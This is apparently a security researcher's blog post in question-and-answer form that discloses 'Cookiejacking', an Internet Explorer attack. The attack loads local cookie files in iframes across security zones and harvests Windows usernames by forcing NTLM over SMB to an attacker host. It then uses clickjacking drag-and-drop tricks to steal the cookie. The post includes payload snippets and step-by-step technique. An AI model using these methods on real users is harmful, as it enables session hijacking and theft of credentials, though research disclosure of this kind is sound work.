Back from Swiss Cyber Storm and Hack in the Box conferences, it's time to post about my conferences talk.
Q: What is Cookiejacking?
A: Cookiejacking is a UI redressing attack that allows an attacker to hijack his victim's cookies without any XSS.
Q: How the hell is possible to steal cookies without a XSS? are you using Firesheep?
A: Cookiejacking leverages on two main issues:
- a 0-day vulnerability affecting every IE version on every Windows OS box
- an advanced Clickjacking approach
Q: Tell me about the 0-day...
A: IE defines Security zones; they are a proprietary mechanism that allow users to group websites according to their source's trust. From a theorical point of view a site assigned to a less-privileged zone (e.g. Internet zone) could not interact with a site/content assigned to a more-privileged zone (e.g. local files on your pc). This is called "Cross zone interaction policy".
Eg. <iframe src="file://c:/test.txt"> will result in an Access denied error.
However if the iframe source is set to a cookie file, the iframe will load the content.
<iframe src="file://C:/Users/%user%/AppData/Roaming/Microsoft/Windows/Cookiesemail@example.com"> will result in iframe loading the cookie.
This breaks the Cross zone interaction policy as a Internet page is accessing a local file. This is a 0-day and works across any IE version on any Windows OS box.
Q: Ok, you can display a cookie inside an iframe, but SOP will block you from accessing the cookie content using JS...
A: True. I can't access that cookie. So I kindly ask my victim to give it to me. I use an advanced Clickjacking technique called "content extraction" (Paul Stone, BHE 2010) and some little JS tricks in order to lure my victim into drag&drop the cookie into an attacker controlled HTML element.
Q: And does it work?
A: You can bet. But you need to solve a couple of issues first...
Q: Tell me more..
A: First of all, cookies file system path depends on Windows username, so you need to guess your victim's username before starting the attack.
You can sniff your victim's username by exploiting a feature of IE: by using IE you can access remote SMB resources using UNC paths to reference them. You can do this without restriction in Internet and Intranet zones.
So, if you force your victim's browser to retrieve a resource like <img src="\\SERVER_IP\img.jpg"> it will start a NTLM challenge-response negotiation with the remote server and, as a part of this negotiation, it sends Windows Username in clear plain text.
So you can just use a script to sniff data on TCP port 445 in order to grab the username.
Q: Wow, what's next?
A: You also need to know which OS version is the victim running, as different OSs store cookies in different folders. But you can guess this by parsing the navigator.userAgent object.
Q: Ok, so knowing the cookie folder and the victim username you can properly set the iframe source, but how can you trick your victim to drag&drop the cookie?
A: I use a Clickjacking approach: the iframe is hidden (opacity=0) but with a given z-index (eg. 1). I overlap some appealing content on the iframe (z-index=0, opacity=100) and I ask my victim to drag it somewhere around the screen. Have a look at this video...
Q: In order for this attack to be effective, you need your victim to perfectly select the cookie content (the whole cookie), right?
A: Right. And I cannot control the relative iframe position into the cookie file, as it is a text file, not a web page. I used a trick: I display cookies in two nested iframes. The first is short and scrollable. The second contains the cookie. When the victim clicks on the cookie, the first iframe start to scroll (autoscroll=100). As this happens while the victim is clicking the mouse button down, the final effect is that the victim selected the whole cookie with just a single click.
Q: But...during the dragging action does the victim notice he's dragging the cookies?
A: Nope. I use a drag feedback image to give the victim the illusion he's just dragging the correct object
Q: Ok, I got it. But it resembles a bit complicated exploit...
A: Not at all. Just find the right subject for your attack page...
Many thanks to Roberto Suggi Liverani and Stefano Di Paola for their support before and during the conference events. Thank you guys!